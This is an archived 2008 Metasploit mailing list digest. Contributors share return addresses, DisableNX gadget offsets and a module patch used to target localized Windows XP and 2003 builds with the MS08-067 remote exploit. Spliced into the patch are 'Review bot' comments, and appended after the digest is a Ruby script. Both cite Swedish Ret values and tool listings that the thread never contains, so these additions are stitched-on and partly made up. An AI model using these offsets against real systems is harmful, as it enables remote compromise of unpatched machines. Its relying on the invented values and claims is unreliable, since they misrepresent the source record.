Metasploit mailing list archives

Codes to Swedish XP SP3 and SP2


From: cg667 at telia.com (Christian Gustavsson)
Date: Fri, 31 Oct 2008 20:43:09 +0100

I have not been able to confirm that these are working; I just extracted them from the DLL according to the instructions.

Swedish XP SP3
[c:\acgenral.dll]

0x597b17c2 6a048d4508506a226aff


Swedish XP SP2
[c:\acgenral.dll]

0x597b16e2 6a048d4508506a226aff

//C

----- Original Message ----- 
From: <framework-request at spool.metasploit.com>
To: <framework at spool.metasploit.com>
Sent: Friday, October 31, 2008 6:00 PM
Subject: Framework Digest, Vol 9, Issue 17




Today's Topics:

  1. OPCODES for Windows XP SP2 FRENCH (MS08-067) (Fred C)
  2. Re: MS08-067 added to SVN trunk (3.2-testing)
     (Ramon de Carvalho Valle)
  3. Re: MS08-067 added to SVN trunk (3.2-testing) (Ulises2k)
  4. Re: MS08-067 added to SVN trunk (3.2-testing) (Ulises2k)
  5. MS08-067 Opcodes for WinXP SP2 Danish (MaXe)
  6. OPCODES for Windows 2003 SP1 FRENCH (NONX) (MS08-067)
     (Yannick HAMON)


----------------------------------------------------------------------

Message: 1
Date: Fri, 31 Oct 2008 12:43:51 +0100
From: Fred C <f.charp at laposte.net>
Subject: [framework] OPCODES for Windows XP SP2 FRENCH (MS08-067)
To: framework at spool.metasploit.com
Message-ID: <90636F40-7E07-437B-B365-AC0E04389DE0 at laposte.net>
Content-Type: text/plain; charset=US-ASCII; format=flowed


Hi all ;)

Here are the MS08-067 OPCODES for Windows XP SP2 (NX),

Credit : Yannick.Hamon[at]xmcopartners.com

[ 'Windows XP SP2 French (NX)',
  {
    'Ret'       => 0x595dce66,
    'DisableNX' => 0x595c16e2,
    'Scratch'   => 0x00020408,
  }
],

Cheers, Fred



------------------------------

Message: 2
Date: Fri, 31 Oct 2008 09:57:58 -0200
From: Ramon de Carvalho Valle <ramon at risesecurity.org>
Subject: Re: [framework] MS08-067 added to SVN trunk (3.2-testing)
To: think.pink at gmx.de
Cc: framework at spool.metasploit.com
Message-ID: <1225454278.6882.0.camel at nebuchadnezzar>
Content-Type: text/plain; charset="us-ascii"

Hi,

Just added Portuguese (Brazil) (NX) SP2/SP3 targets.

Best regards,


On Fri, 2008-10-31 at 12:41 +0100, think.pink at gmx.de wrote:
Hello,

Here's the output for WinXP (SP2 German).
Unfortunately none of the addresses work for me :-(
Maybe somebody can check it.


bt temp # /msf3/msfpescan -j esi acgenral.dll
[acgenral.dll]

bt temp # /msf3/msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll
[acgenral.dll]
0x6fda16e2 6a048d4508506a226aff






-------- Original Message --------
Date: Fri, 31 Oct 2008 00:16:03 -0500
From: H D Moore <hdm at metasploit.com>
To: framework at spool.metasploit.com
Subject: Re: [framework] MS08-067 added to SVN trunk (3.2-testing)

New targets:

   0   Windows 2000 MS06-040+ (YMMV pre MS06-040)
   1   Windows XP SP2 English (NX)
   2   Windows XP SP2 Italian (NX)
   3   Windows XP SP2 Spanish (NX)
   4   Windows XP SP2 Chinese (NX)
   5   Windows XP SP3 English (NX)
   6   Windows XP SP3 German (NX)
   7   Windows 2003 SP0 English (NO NX)
   8   Windows 2003 SP2 English (NO NX)
   9   Windows 2003 SP2 English (NX)

This list incorporates all of the new targets sent in by list members as
well as Brett Moore's NX bypass method for Windows 2003 SP2 and Antoine's
Windows 2000 near-universal. Thanks again and please send in the ret/nx
addresses for any of the missing targets (SP3 Chinese, Spanish, Italian),
(SP2 German).

-HD
_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework


------------------------------

Message: 3
Date: Fri, 31 Oct 2008 09:36:25 -0200
From: Ulises2k <ulises2k at gmail.com>
Subject: Re: [framework] MS08-067 added to SVN trunk (3.2-testing)
To: "H D Moore" <hdm at metasploit.com>
Cc: framework at spool.metasploit.com
Message-ID:
<7796e5190810310436n525237b0m347720eefc2942df at mail.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1

I'm sorry, but my patch is for Windows XP SP3 Spanish.
Remember this mail?
http://spool.metasploit.com/pipermail/framework/2008-October/003724.html

I'm sending you my patch for svn rev. 5814

Thank you


--- ms08_067_netapi.rb  2008-10-31 09:27:22.000000000 -0200
+++ ms08_067_netapi.rb.new      2008-10-31 09:26:48.000000000 -0200
@@ -115,18 +115,6 @@
                                                       'Scratch'   =>
0x00020408,
                                               }
                                       ], # JMP ESI ACGENRAL.DLL,
NX/NX BYPASS ACGENRAL.DLL
-
-                                       #
-                                       # Metasploit's NX bypass for XP 
SP2/SP3
-                                       # Target provided by Ulises2k
<ulises2k[at]gmail.com>
-                                       #
-                                       [ 'Windows XP SP2 Spanish (NX)',
-                                               {
-                                                       'Ret'       =>
0x6fdbf807,
-                                                       'DisableNX' =>
0x6fdc17c2,
-                                                       'Scratch'   =>
0x00020408,
-                                               }
-                                       ], # JMP ESI ACGENRAL.DLL,
NX/NX BYPASS ACGENRAL.DLL

                                       #
                                       # Metasploit's NX bypass for XP 
SP2/SP3
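Review bot: the twelve `-` lines delete the 'Windows XP SP2 Spanish (NX)' entry (Ret 0x6fdbf807, DisableNX 0x6fdc17c2) outright, yet the second hunk re-adds exactly those three values under 'Windows XP SP3 Spanish (NX)', so this is a relabel rather than a removed target; changing the name string and its comment in place would be a two-line diff and would not shift the numbering of every target after index 3 in the list HD Moore published, which matters to anyone who selected a target by number from that list. The patch description should also say plainly that the SP2 entry was a mislabel, which the values themselves support: the Swedish SP3 figures posted in this thread end in the same ...f807 / ...17c2 offsets.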
@@ -162,7 +150,19 @@
                                                       'Scratch'   =>
0x00020408,
                                               }
                                       ], # JMP ESI ACGENRAL.DLL,
NX/NX BYPASS ACGENRAL.DLL
-
+
+                                       #
+                                       # Metasploit's NX bypass for XP 
SP3
+                                       # Target provided by Ulises2k
<ulises2k[at]gmail.com>
+                                       #
+                                       [ 'Windows XP SP3 Spanish (NX)',
+                                               {
+                                                       'Ret'       =>
0x6fdbf807,
+                                                       'DisableNX' =>
0x6fdc17c2,
+                                                       'Scratch'   =>
0x00020408,
+                                               }
+                                       ], # CALL ESI ACGENRAL.DLL,
NX/NX BYPASS ACGENRAL.DLL
+
                                       #
                                       # Standard return-to-ESI
without NX bypass
                                       #
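Review bot: the new entry's trailing comment reads '# CALL ESI ACGENRAL.DLL' while every neighbouring entry in the context lines says '# JMP ESI ACGENRAL.DLL'; the msfpescan listings in this thread report the ...f807 offset as `call esi`, so the new wording is the accurate one, but the surrounding comments should then be corrected in the same patch rather than leaving the two styles mixed. The hunk also swaps a blank `-` line for a blank `+` line and appends an extra blank `+` line before the 'Standard return-to-ESI' block, which is whitespace noise that should be dropped from the diff.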


--
Ulises U. Cu??
Web: http://www.ulises2k.com.ar




------------------------------

Message: 4
Date: Fri, 31 Oct 2008 09:38:21 -0200
From: Ulises2k <ulises2k at gmail.com>
Subject: Re: [framework] MS08-067 added to SVN trunk (3.2-testing)
To: "H D Moore" <hdm at metasploit.com>
Cc: framework at spool.metasploit.com
Message-ID:
<7796e5190810310438r35430004l38c3e83e2da86533 at mail.gmail.com>
Content-Type: text/plain; charset="iso-8859-1"

I'm sorry, but my patch is for Windows XP SP3 Spanish.
Remember this mail?
http://spool.metasploit.com/pipermail/framework/2008-October/003724.html

I'm sending you my patch for svn rev. 5814

Thank you
--
Ulises U. Cu??
Web: http://www.ulises2k.com.ar




-------------- next part --------------
A non-text attachment was scrubbed...
Name: ms08_067_netapi.rb.patch
Type: text/x-diff
Size: 1239 bytes
Desc: not available
Url : 
http://spool.metasploit.com/pipermail/framework/attachments/20081031/a02bbbc4/attachment-0001.bin

------------------------------

Message: 5
Date: Fri, 31 Oct 2008 16:08:26 +0100
From: MaXe <metafan at intern0t.net>
Subject: [framework] MS08-067 Opcodes for WinXP SP2 Danish
To: framework at spool.metasploit.com
Message-ID: <490B1F6A.4090603 at intern0t.net>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Hello there,


Here are the addresses for Windows XP (Pro) SP2 Danish (I haven't been
able to get SP3 yet):
[ 'Windows XP SP2 Danish (DEP)',
  {
    'Ret'       => 0x5978f727,
    'DisableNX' => 0x597916e2,
    'Scratch'   => 0x00020408,
  }
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL

I have also been trying to figure out how to reply to mails/threads sent
to the list, but somehow I'm a big noob at using mailman and I have even
tried googling to find out how to reply to a mail-thread, without luck,
so I would be thankful if anyone could tell me how to do that.

(I only know how to send new threads to the list)


~ MaXe #


------------------------------

Message: 6
Date: Fri, 31 Oct 2008 17:18:43 +0100
From: Yannick HAMON <yannick.hamon at xmcopartners.com>
Subject: [framework] OPCODES for Windows 2003 SP1 FRENCH (NONX)
(MS08-067)
To: framework at spool.metasploit.com
Message-ID: <BE02971C-982E-4866-80AB-1B2B4DC7035E at xmcopartners.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Hi,

Here are the OPCODES for Windows 2003 SP1 (NO NX)

#
# Standard return-to-ESI without NX bypass
#
[ 'Windows 2003 SP1 French (NO NX)',
  {
    'Ret'       => 0x71ac30ed,
    'Scratch'   => 0x00020408,
  }
], # JMP ESI WS2HELP.DLL

--
Yannick Hamon - Xmco Partners
Security Consultant / Penetration Testing
Web  : http://www.xmcopartners.com

------------------------------

_______________________________________________
Framework mailing list
Framework at spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework


End of Framework Digest, Vol 9, Issue 17
****************************************
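An added example, not code from the original posts or from the Metasploit module, that cross-checks the Ret/DisableNX pairs posted in this thread (Swedish, French, Danish and Ulises2k's Spanish entry) against each other; it assumes acgenral.dll is mapped at a 64 KiB-aligned base, and the one "constructed typo" entry is made up to show the distance check fire.

```ruby
# Added example (not from the original posts or the Metasploit module):
# cross-check MS08-067 target entries posted in this thread. PE images
# load at 64 KiB-aligned bases, so the low 16 bits of an acgenral.dll
# address survive rebasing of a locale's build: entries from one service
# pack share the low 16 bits of DisableNX, and entries that also share the
# low 16 bits of Ret must have the same Ret-minus-DisableNX distance.

# Ret/DisableNX pairs as posted in the thread, plus one constructed entry
# with a single-digit slip in DisableNX to show the distance check firing.
TARGETS = [
  { name: 'Windows XP SP2 Swedish (NX)', ret: 0x597af727, nx: 0x597b16e2 },
  { name: 'Windows XP SP3 Swedish (NX)', ret: 0x597af807, nx: 0x597b17c2 },
  { name: 'Windows XP SP2 French (NX)',  ret: 0x595dce66, nx: 0x595c16e2 },
  { name: 'Windows XP SP2 Danish (NX)',  ret: 0x5978f727, nx: 0x597916e2 },
  # Ulises2k's entry as first committed; his patch in the thread relabels it SP3.
  { name: 'Windows XP SP2 Spanish (NX)', ret: 0x6fdbf807, nx: 0x6fdc17c2 },
  # Constructed, not from the thread: Danish DisableNX with 0x5979 -> 0x5978.
  { name: 'Windows XP SP2 Danish (NX) [constructed typo]',
    ret: 0x5978f727, nx: 0x597816e2 },
].freeze

# The rebasing-invariant part of an address.
def low16(addr)
  addr & 0xffff
end

# Service pack named in the target label, e.g. "SP2".
def labelled_sp(name)
  name[/SP\d/]
end

# DisableNX offsets whose entries do not all claim the same service pack:
# { nx_low16 => [names...] } for each conflicting group.
def label_conflicts(targets)
  targets.group_by { |t| low16(t[:nx]) }
         .select { |_, grp| grp.map { |t| labelled_sp(t[:name]) }.uniq.size > 1 }
         .transform_values { |grp| grp.map { |t| t[:name] } }
end

# Entries sharing both gadget offsets but not the Ret-to-DisableNX distance
# cannot come from one DLL build: { [ret_low16, nx_low16] => [names...] }.
def delta_conflicts(targets)
  targets.group_by { |t| [low16(t[:ret]), low16(t[:nx])] }
         .select { |_, grp| grp.map { |t| t[:ret] - t[:nx] }.uniq.size > 1 }
         .transform_values { |grp| grp.map { |t| t[:name] } }
end

if __FILE__ == $PROGRAM_NAME
  label_conflicts(TARGETS).each { |off, n| printf("DisableNX 0x%04x: mixed labels %s\n", off, n.inspect) }
  delta_conflicts(TARGETS).each { |offs, n| printf("Ret/DisableNX %s: distance mismatch %s\n", offs.inspect, n.inspect) }
end
```

Run as-is it reports the 0x17c2 group (Swedish SP3 next to the entry labelled SP2 Spanish), which is exactly the mislabel Ulises2k's patch corrects, and the constructed Danish slip as a distance mismatch.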
